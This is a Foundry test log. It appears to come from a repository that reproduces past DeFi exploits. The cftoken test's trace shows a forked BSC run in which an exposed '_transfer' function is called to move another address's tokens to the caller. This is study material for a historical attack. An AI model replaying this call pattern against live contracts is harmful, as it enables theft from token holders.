Compiling 21 files with Solc 0.8.28
Compiling 20 files with Solc 0.8.10
Solc 0.8.28 finished in 877.63ms
Solc 0.8.10 finished in 1.01s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.18s (2.03ms CPU time)

Ran 1 test for src/test/2022-04/cftoken_exp.sol:ContractTest
[PASS] testExploit() (gas: 88733)
Logs:
  Before exploit, cftoken balance:: 0
  After exploit, cftoken balance:: 930000000000000000000

Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 16841980 [1.684e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [88733] ContractTest::testExploit()
    ├─ [2535] 0x8B7218CF6Ac641382D7C723dE8aA173e98a80196::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Before exploit, cftoken balance:", val: 0)
    ├─ [71497] 0x8B7218CF6Ac641382D7C723dE8aA173e98a80196::_transfer(0x7FdC0D8857c6D90FD79E22511baf059c0c71BF8b, DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 1000000000000000000000 [1e21])
    │   ├─ emit Transfer(from: 0x7FdC0D8857c6D90FD79E22511baf059c0c71BF8b, to: 0x7FdC0D8857c6D90FD79E22511baf059c0c71BF8b, value: 14000000000000000000 [1.4e19])
    │   ├─ emit Transfer(from: 0x7FdC0D8857c6D90FD79E22511baf059c0c71BF8b, to: 0xa9056272Ca777a63ae3A275d7aab078fd90A1691, value: 21000000000000000000 [2.1e19])
    │   ├─ emit Transfer(from: 0x7FdC0D8857c6D90FD79E22511baf059c0c71BF8b, to: 0x3eCfFcCc4C35CCd71A7c61446c90117fb7995fB1, value: 35000000000000000000 [3.5e19])
    │   ├─ emit Transfer(from: 0x7FdC0D8857c6D90FD79E22511baf059c0c71BF8b, to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 930000000000000000000 [9.3e20])
    │   ├─  storage changes:
    │   │   @ 0x3e1a6e48cd7e8291e25c14adac8306b064f909d041e2dc71d7bda438c8681263: 0 → 0x0000000000000000000000000000000000000000000000326a57b8a619480000
    │   │   @ 13: 0x0000000000000000000000000000000000000000000041b534b496842c4e5448 → 0x0000000000000000000000000000000000000000000041b71a6d91140efa5448
    │   │   @ 0xc6820c7d0e8a2186a11c150b737df331ec5c8bc0952595f1f00a6d55a2d6bfc3: 0x0000000000000000000000000000000000000000000141a7fe5320c762d5efd6 → 0x0000000000000000000000000000000000000000000141728ad370d4abadefd6
    │   │   @ 0x782e14c0212f4b823860af386cde7a7c30579669a71033155551295aa14e8753: 0x00000000000000000000000000000000000000000000276cb939271c1a9561cc → 0x00000000000000000000000000000000000000000000276ddca823d8d5c961cc
    │   │   @ 0x30447d221f790f8511fa27cc8abe8501a57209ce9361c4927bdd4c4d209b9535: 0x00000000000000000000000000000000000000000000001e7244294c5e71d2f7 → 0x00000000000000000000000000000000000000000000002057fd23dc411dd2f7
    │   └─ ← [Stop]
    ├─ [535] 0x8B7218CF6Ac641382D7C723dE8aA173e98a80196::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 930000000000000000000 [9.3e20]
    ├─ emit log_named_uint(key: "After exploit, cftoken balance:", val: 930000000000000000000 [9.3e20])
    ├─  storage changes:
    │   @ 0x3e1a6e48cd7e8291e25c14adac8306b064f909d041e2dc71d7bda438c8681263: 0 → 0x0000000000000000000000000000000000000000000000326a57b8a619480000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.85s (3.86s CPU time)

Ran 2 test suites in 7.85s (9.03s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
